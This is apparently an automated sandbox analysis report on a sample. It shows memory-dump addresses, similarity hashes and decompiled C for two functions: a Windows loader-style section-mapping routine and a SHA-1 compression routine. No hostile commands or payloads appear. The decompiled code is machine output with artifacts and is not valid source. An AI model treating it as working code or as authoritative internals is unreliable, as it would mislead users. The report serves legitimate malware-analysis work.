                                                                                                    0x00af6fdd
                                                                                                    0x00af6fe2
                                                                                                    0x00af6fe7
                                                                                                    0x00af6feb
                                                                                                    0x00af6fef
                                                                                                    0x00af6ff3
                                                                                                    0x00ab520c
                                                                                                    0x00ab520c
                                                                                                    0x00ab520f
                                                                                                    0x00ab5215
                                                                                                    0x00ab5234
                                                                                                    0x00ab523a
                                                                                                    0x00ab523a
                                                                                                    0x00ab5244
                                                                                                    0x00ab5245
                                                                                                    0x00ab5246
                                                                                                    0x00ab5251
                                                                                                    0x00ab5251
                                                                                                    0x00af6f13
                                                                                                    0x00af6f17
                                                                                                    0x00af6f17
                                                                                                    0x00af6f18
                                                                                                    0x00af6f1b
                                                                                                    0x00af6f1f
                                                                                                    0x00af6f23
                                                                                                    0x00000000
                                                                                                    0x00af6f28
                                                                                                    0x00ab5204
                                                                                                    0x00ab5204
                                                                                                    0x00ab5208
                                                                                                    0x00000000
                                                                                                    0x00ab5208
                                                                                                    0x00ab5185
                                                                                                    0x00ab5188
                                                                                                    0x00ab518a
                                                                                                    0x00ab518e
                                                                                                    0x00ab5195
                                                                                                    0x00af6db1
                                                                                                    0x00af6db5
                                                                                                    0x00af6db9
                                                                                                    0x00ab519b
                                                                                                    0x00ab519b
                                                                                                    0x00ab519e
                                                                                                    0x00ab51a7
                                                                                                    0x00ab51a9
                                                                                                    0x00ab51a9
                                                                                                    0x00ab51b5
                                                                                                    0x00ab51b8
                                                                                                    0x00ab51bb
                                                                                                    0x00ab51be
                                                                                                    0x00ab51c1
                                                                                                    0x00ab51c5
                                                                                                    0x00ab51c9
                                                                                                    0x00ab51cd
                                                                                                    0x00ab51cd
                                                                                                    0x00ab51d8
                                                                                                    0x00ab51dc
                                                                                                    0x00ab51e0
                                                                                                    0x00af6dcc
                                                                                                    0x00af6dd0
                                                                                                    0x00af6dd5
                                                                                                    0x00af6ddd
                                                                                                    0x00af6de1
                                                                                                    0x00af6de1
                                                                                                    0x00af6de5
                                                                                                    0x00af6deb
                                                                                                    0x00af6df1
                                                                                                    0x00af6df7
                                                                                                    0x00af6dfd
                                                                                                    0x00af6e01
                                                                                                    0x00af6e05
                                                                                                    0x00af6e09
                                                                                                    0x00af6e0d
                                                                                                    0x00af6e11
                                                                                                    0x00af6e11
                                                                                                    0x00ab51eb
                                                                                                    0x00af6e1a
                                                                                                    0x00af6e1f
                                                                                                    0x00af6e21
                                                                                                    0x00af6e23
                                                                                                    0x00000000
                                                                                                    0x00ab51f1
                                                                                                    0x00ab51f1
                                                                                                    0x00000000
                                                                                                    0x00ab51f1

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID:
                                                                                                    • API String ID: 3446177414-0
                                                                                                    • Opcode ID: 482043fbc1b400eda9c0e7f0d356cfb7a4257633bead8457d2e224645d7e0d9a
                                                                                                    • Instruction ID: f61989c5aee04fe1d93cc85eb1ffd27ca29b09a39d3438defc776c5b31bef0cf
                                                                                                    • Opcode Fuzzy Hash: 482043fbc1b400eda9c0e7f0d356cfb7a4257633bead8457d2e224645d7e0d9a
                                                                                                    • Instruction Fuzzy Hash: 71C100756097808FD354CF68C580A6AFBF1BF88304F188A6EF9998B352D771E945CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB03E2, Relevance: 1.8, APIs: 1, Instructions: 254COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 74%
                                                                                                    			E00AB03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0xb7d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E00AB0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E00ACB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00A9B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0xb77c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E00AA7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E00AA7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E00B07016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00AC9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E00B069A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0xb77c04 != 0) {
						_t118 = _v12;
						_t120 = E00B0A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0xb77bd8;
						if( *0xb77bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00AC95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00AC99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E00B03540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00A8B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00ACAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0xb78474 - 3;
										if( *0xb78474 != 3) {
											 *0xb779dc =  *0xb779dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E00AA7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E00AA7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E00B07016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0xb78708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0xb77b00; // 0x0
							asm("ror esi, cl");
							 *0xb7b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00AC95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00A97F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                    0x00ab03f1
                                                                                                    0x00ab03f7
                                                                                                    0x00ab03f9
                                                                                                    0x00ab03fb
                                                                                                    0x00ab03fd
                                                                                                    0x00ab0400
                                                                                                    0x00ab040a
                                                                                                    0x00af4c7a
                                                                                                    0x00ab0537
                                                                                                    0x00ab0547
                                                                                                    0x00ab0410
                                                                                                    0x00ab0410
                                                                                                    0x00ab0414
                                                                                                    0x00ab0417
                                                                                                    0x00ab041a
                                                                                                    0x00ab0421
                                                                                                    0x00ab0424
                                                                                                    0x00ab042b
                                                                                                    0x00ab043b
                                                                                                    0x00ab043e
                                                                                                    0x00ab043f
                                                                                                    0x00ab043f
                                                                                                    0x00ab0446
                                                                                                    0x00ab0449
                                                                                                    0x00ab044c
                                                                                                    0x00ab044f
                                                                                                    0x00ab0459
                                                                                                    0x00af4c8d
                                                                                                    0x00ab045f
                                                                                                    0x00ab045f
                                                                                                    0x00ab045f
                                                                                                    0x00ab0467
                                                                                                    0x00af4c97
                                                                                                    0x00af4c9d
                                                                                                    0x00af4ca4
                                                                                                    0x00af4caa
                                                                                                    0x00af4caf
                                                                                                    0x00af4cb1
                                                                                                    0x00af4cc3
                                                                                                    0x00af4cb3
                                                                                                    0x00af4cbc
                                                                                                    0x00af4cbc
                                                                                                    0x00af4cc8
                                                                                                    0x00af4ccb
                                                                                                    0x00af4cd7
                                                                                                    0x00af4cda
                                                                                                    0x00af4cdf
                                                                                                    0x00af4cdf
                                                                                                    0x00af4ccb
                                                                                                    0x00af4ca4
                                                                                                    0x00ab046d
                                                                                                    0x00ab046f
                                                                                                    0x00ab046f
                                                                                                    0x00ab0471
                                                                                                    0x00ab0476
                                                                                                    0x00ab047a
                                                                                                    0x00ab047b
                                                                                                    0x00ab0483
                                                                                                    0x00ab0489
                                                                                                    0x00ab048d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4ce9
                                                                                                    0x00af4cef
                                                                                                    0x00af4d22
                                                                                                    0x00af4d22
                                                                                                    0x00000000
                                                                                                    0x00af4d22
                                                                                                    0x00af4cf1
                                                                                                    0x00af4cf7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4cf9
                                                                                                    0x00af4cff
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4d05
                                                                                                    0x00af4d07
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4d0d
                                                                                                    0x00af4d0f
                                                                                                    0x00af4d14
                                                                                                    0x00af4d16
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4d1c
                                                                                                    0x00af4d1c
                                                                                                    0x00ab0499
                                                                                                    0x00ab0535
                                                                                                    0x00ab0535
                                                                                                    0x00000000
                                                                                                    0x00ab0535
                                                                                                    0x00ab04a6
                                                                                                    0x00af4d2c
                                                                                                    0x00af4d37
                                                                                                    0x00af4d39
                                                                                                    0x00af4d3b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4d41
                                                                                                    0x00af4d48
                                                                                                    0x00ab0527
                                                                                                    0x00ab052b
                                                                                                    0x00ab052d
                                                                                                    0x00ab0530
                                                                                                    0x00ab0530
                                                                                                    0x00000000
                                                                                                    0x00ab052b
                                                                                                    0x00af4d4e
                                                                                                    0x00ab04ac
                                                                                                    0x00ab04ac
                                                                                                    0x00ab04af
                                                                                                    0x00ab04b2
                                                                                                    0x00ab04b7
                                                                                                    0x00ab04b9
                                                                                                    0x00ab04bb
                                                                                                    0x00ab04bd
                                                                                                    0x00ab04bf
                                                                                                    0x00ab04c5
                                                                                                    0x00ab04c9
                                                                                                    0x00af4d53
                                                                                                    0x00af4d59
                                                                                                    0x00af4db9
                                                                                                    0x00af4dba
                                                                                                    0x00af4dbf
                                                                                                    0x00af4dc2
                                                                                                    0x00af4dc4
                                                                                                    0x00af4dc7
                                                                                                    0x00af4dce
                                                                                                    0x00000000
                                                                                                    0x00af4dce
                                                                                                    0x00af4d5b
                                                                                                    0x00af4d61
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4d63
                                                                                                    0x00af4d69
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4d6b
                                                                                                    0x00af4d6e
                                                                                                    0x00af4d74
                                                                                                    0x00af4d76
                                                                                                    0x00af4d7c
                                                                                                    0x00af4d7e
                                                                                                    0x00af4d84
                                                                                                    0x00af4d89
                                                                                                    0x00af4d8c
                                                                                                    0x00af4d8d
                                                                                                    0x00af4d92
                                                                                                    0x00af4d95
                                                                                                    0x00af4d96
                                                                                                    0x00af4d98
                                                                                                    0x00af4d9a
                                                                                                    0x00af4d9f
                                                                                                    0x00af4da4
                                                                                                    0x00af4da6
                                                                                                    0x00af4da8
                                                                                                    0x00af4daf
                                                                                                    0x00af4db1
                                                                                                    0x00af4db1
                                                                                                    0x00af4daf
                                                                                                    0x00af4da6
                                                                                                    0x00af4d84
                                                                                                    0x00af4d7c
                                                                                                    0x00000000
                                                                                                    0x00af4d74
                                                                                                    0x00ab04d6
                                                                                                    0x00af4de1
                                                                                                    0x00ab04dc
                                                                                                    0x00ab04dc
                                                                                                    0x00ab04dc
                                                                                                    0x00ab04e4
                                                                                                    0x00af4deb
                                                                                                    0x00af4df1
                                                                                                    0x00af4df8
                                                                                                    0x00af4dfe
                                                                                                    0x00af4e03
                                                                                                    0x00af4e05
                                                                                                    0x00af4e17
                                                                                                    0x00af4e07
                                                                                                    0x00af4e10
                                                                                                    0x00af4e10
                                                                                                    0x00af4e1c
                                                                                                    0x00af4e1f
                                                                                                    0x00af4e35
                                                                                                    0x00af4e35
                                                                                                    0x00af4e1f
                                                                                                    0x00af4df8
                                                                                                    0x00ab04f1
                                                                                                    0x00ab04fa
                                                                                                    0x00af4e3f
                                                                                                    0x00af4e47
                                                                                                    0x00af4e5b
                                                                                                    0x00af4e61
                                                                                                    0x00af4e67
                                                                                                    0x00af4e69
                                                                                                    0x00af4e71
                                                                                                    0x00af4e73
                                                                                                    0x00ab0500
                                                                                                    0x00ab0500
                                                                                                    0x00ab0500
                                                                                                    0x00ab04fa
                                                                                                    0x00ab0508
                                                                                                    0x00ab051d
                                                                                                    0x00ab051d
                                                                                                    0x00ab051f
                                                                                                    0x00ab0524
                                                                                                    0x00000000
                                                                                                    0x00ab0524
                                                                                                    0x00ab0515
                                                                                                    0x00ab0517
                                                                                                    0x00af4e7a
                                                                                                    0x00af4e7c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af4e85
                                                                                                    0x00000000
                                                                                                    0x00af4e85
                                                                                                    0x00000000
                                                                                                    0x00ab0517

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3c4e97898fba323a94025b39b5f4f07a126dec559b090543ade98b3a7dd98645
                                                                                                    • Instruction ID: 624c4f9ebab4c8f497c3bc44e12a08ed6f1ecf45254710cb69c8322aa581ed42
                                                                                                    • Opcode Fuzzy Hash: 3c4e97898fba323a94025b39b5f4f07a126dec559b090543ade98b3a7dd98645
                                                                                                    • Instruction Fuzzy Hash: 8A91F631E042189FDB319BA8CC45FFF7BA8AB05714F154265FA11AB2E2DB749D40CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00438C5B, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 72%
                                                                                                    			E00438C5B(void* __edi, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t278;
				signed int* _t279;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				signed int _t293;
				signed int _t296;
				signed int _t300;
				signed int _t304;
				signed int _t306;
				signed int _t312;
				signed int _t320;
				signed int _t322;
				signed int _t325;
				signed int _t327;
				signed int _t336;
				signed int _t342;
				signed int _t343;
				signed int _t348;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t365;
				signed int _t368;
				signed int _t372;
				signed int _t373;
				signed int _t402;
				signed int _t407;
				signed int _t413;
				signed int _t416;
				signed int _t423;
				signed int _t426;
				signed int _t435;
				signed int _t437;
				signed int _t440;
				signed int _t448;
				signed int _t463;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t474;
				signed int _t482;
				signed int _t483;
				signed int* _t484;
				void* _t486;
				signed int* _t487;
				signed int _t494;
				signed int _t497;
				signed int _t502;
				signed int _t505;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed int _t516;
				signed int _t528;
				signed int _t531;
				signed int _t538;
				void* _t544;
				void* _t546;

				_t486 = __edi + 0x55b884f3;
				_t544 = _t546;
				_push(_t486);
				_t487 = _a4;
				_push(__edi);
				_t356 = 0;
				_t3 =  &(_t487[7]); // 0x1b
				_t278 = _t3;
				do {
					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t278 - 1) & 0x000000ff) << 0x00000008 |  *_t278 & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x148) = (((_t278[3] & 0x000000ff) << 0x00000008 | _t278[4] & 0x000000ff) << 0x00000008 | _t278[5] & 0x000000ff) << 0x00000008 | _t278[6] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x144) = (((_t278[7] & 0x000000ff) << 0x00000008 | _t278[8] & 0x000000ff) << 0x00000008 | _t278[9] & 0x000000ff) << 0x00000008 | _t278[0xa] & 0x000000ff;
					 *(_t544 + _t356 * 4 - 0x140) = (((_t278[0xb] & 0x000000ff) << 0x00000008 | _t278[0xc] & 0x000000ff) << 0x00000008 | _t278[0xd] & 0x000000ff) << 0x00000008 | _t278[0xe] & 0x000000ff;
					_t356 = _t356 + 4;
					_t278 =  &(_t278[0x10]);
				} while (_t356 < 0x10);
				_t279 =  &_v304;
				_v8 = 0x10;
				do {
					_t402 =  *(_t279 - 0x18);
					_t463 =  *(_t279 - 0x14);
					_t360 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t402;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t463;
					_t279[8] = _t360;
					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
					_t279 =  &(_t279[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t47 =  &_v8;
					 *_t47 = _v8 - 1;
					_t279[6] = _t320 ^ _t402;
					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t360 ^ _t463;
				} while ( *_t47 != 0);
				_t322 =  *_t487;
				_t280 = _t487[1];
				_t361 = _t487[2];
				_t407 = _t487[3];
				_v12 = _t322;
				_v16 = _t487[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t466 = _v8;
					_t494 = _t322 + ( !_t280 & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t325 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t407;
					_v12 = _t494;
					asm("rol esi, 0x5");
					_v8 = _t361;
					_t413 = _t494 + ( !_t325 & _t361 | _t280 & _t325) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t497 = _t280;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t365 = _v12;
					_v8 = _t325;
					_t327 = _v8;
					_v12 = _t413;
					asm("rol edx, 0x5");
					_t286 = _t413 + ( !_t365 & _t497 | _t325 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t416 = _v12;
					_v16 = _t497;
					asm("ror ecx, 0x2");
					_v8 = _t365;
					_v12 = _t286;
					asm("rol eax, 0x5");
					_v16 = _t327;
					_t502 = _t286 + ( !_t416 & _t327 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t361 = _v12;
					_t289 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t416;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_v16 = _t289;
					_t280 = _v12;
					_t505 = _t502 + ( !_t361 & _t289 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t407 = _v8;
					asm("ror ecx, 0x2");
					_t467 = _t466 + 5;
					_t322 = _t505;
					_v12 = _t322;
					_v8 = _t467;
				} while (_t467 < 0x14);
				_t468 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t407;
					_t508 = _t505 + (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t336 = _v12;
					_v12 = _t508;
					asm("rol esi, 0x5");
					_t423 = _t508 + (_t361 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t511 = _t280;
					_v16 = _t361;
					_t368 = _v12;
					_v12 = _t423;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t293 = _t423 + (_t280 ^ _t336 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t426 = _v12;
					_v8 = _t336;
					_v8 = _t368;
					_v12 = _t293;
					asm("rol eax, 0x5");
					_t468 = _t468 + 5;
					_t361 = _v12;
					asm("ror edx, 0x2");
					_t147 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
					_t512 = _t293 + (_t336 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t147;
					_t296 = _v8;
					_v8 = _t426;
					_v12 = _t512;
					asm("rol esi, 0x5");
					_t407 = _v8;
					_t505 = _t512 + (_t296 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
					_v16 = _t296;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
				} while (_t468 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t407;
					asm("ror eax, 0x2");
					_t516 = ((_t361 | _t280) & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
					_t474 = _v12;
					_v12 = _t516;
					asm("rol esi, 0x5");
					_t342 = _v8;
					asm("ror edi, 0x2");
					_t435 = ((_t280 | _t474) & _t361 | _t280 & _t474) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
					_v16 = _t361;
					_t372 = _v12;
					_v12 = _t435;
					asm("rol edx, 0x5");
					_v8 = _t280;
					_t437 = ((_t474 | _t372) & _t280 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t300 = _v12;
					_v8 = _t474;
					_v12 = _t437;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t528 = ((_t372 | _t300) & _t474 | _t372 & _t300) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t440 = _t372;
					_t361 = _v12;
					_v8 = _t440;
					_v12 = _t528;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t505 = ((_t300 | _t361) & _t440 | _t300 & _t361) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
					_t407 = _t300;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t505;
					_t343 = _t342 + 5;
					_v8 = _t343;
				} while (_t343 < 0x3c);
				_t482 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t483 = _v8;
					asm("ror eax, 0x2");
					_t531 = (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
					_t348 = _v12;
					_v16 = _t407;
					_v12 = _t531;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t448 = (_t361 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
					_v16 = _t361;
					_t373 = _v12;
					_v12 = _t448;
					asm("rol edx, 0x5");
					_v16 = _t280;
					asm("ror ecx, 0x2");
					_t304 = (_t280 ^ _t348 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
					_t407 = _v12;
					_v12 = _t304;
					asm("rol eax, 0x5");
					_v16 = _t348;
					_t538 = (_t348 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
					_t306 = _t373;
					_v8 = _t348;
					asm("ror edx, 0x2");
					_v8 = _t373;
					_t361 = _v12;
					_v12 = _t538;
					asm("rol esi, 0x5");
					_t482 = _t483 + 5;
					_t505 = (_t306 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
					_v16 = _t306;
					_t280 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t407;
					_v12 = _t505;
					_v8 = _t482;
				} while (_t482 < 0x50);
				_t484 = _a4;
				_t484[2] = _t484[2] + _t361;
				_t484[3] = _t484[3] + _t407;
				_t312 = _t484[4] + _v16;
				 *_t484 =  *_t484 + _t505;
				_t484[1] = _t484[1] + _t280;
				_t484[4] = _t312;
				_t484[0x17] = 0;
				return _t312;
			}


































































                                                                                                    0x00438c5b
                                                                                                    0x00438c61
                                                                                                    0x00438c6a
                                                                                                    0x00438c6b
                                                                                                    0x00438c6e
                                                                                                    0x00438c6f
                                                                                                    0x00438c71
                                                                                                    0x00438c71
                                                                                                    0x00438c74
                                                                                                    0x00438c96
                                                                                                    0x00438cbc
                                                                                                    0x00438ce2
                                                                                                    0x00438d04
                                                                                                    0x00438d0b
                                                                                                    0x00438d0e
                                                                                                    0x00438d11
                                                                                                    0x00438d1a
                                                                                                    0x00438d20
                                                                                                    0x00438d27
                                                                                                    0x00438d38
                                                                                                    0x00438d3b
                                                                                                    0x00438d3e
                                                                                                    0x00438d42
                                                                                                    0x00438d44
                                                                                                    0x00438d46
                                                                                                    0x00438d4f
                                                                                                    0x00438d52
                                                                                                    0x00438d55
                                                                                                    0x00438d60
                                                                                                    0x00438d66
                                                                                                    0x00438d68
                                                                                                    0x00438d68
                                                                                                    0x00438d6b
                                                                                                    0x00438d6e
                                                                                                    0x00438d6e
                                                                                                    0x00438d73
                                                                                                    0x00438d75
                                                                                                    0x00438d78
                                                                                                    0x00438d7b
                                                                                                    0x00438d81
